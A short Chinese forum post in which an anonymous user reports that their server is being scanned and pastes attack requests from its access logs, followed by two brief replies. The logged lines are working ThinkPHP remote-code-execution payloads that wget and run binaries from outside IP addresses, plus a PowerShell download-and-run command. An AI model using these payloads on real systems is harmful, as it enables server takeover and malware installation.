我被攻击了 连接webshell 远控服务器 恶意网站
服务器近期一直被黑产扫描
匿名用户 2020-03-14 18:18:00 871人浏览

GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://195.88.208.161/bins/UnHAnaAW.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"

GET /index.php?s=/index/  hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://155.138.215.168/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"

GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://170.130.172.42/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"

GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://ero.bckl.ir/download.exe','%SystemRoot%/Temp/ioxlcjfesyyxadv10337.exe');start%20%SystemRoot%/Temp/ioxlcjfesyyxadv10337.exe

服务器最近一直被扫描

acb9550 2020-03-21 17:09:21 回复
看不懂
匿名用户 2020-03-18 15:42:13 回复
都是常规操作啊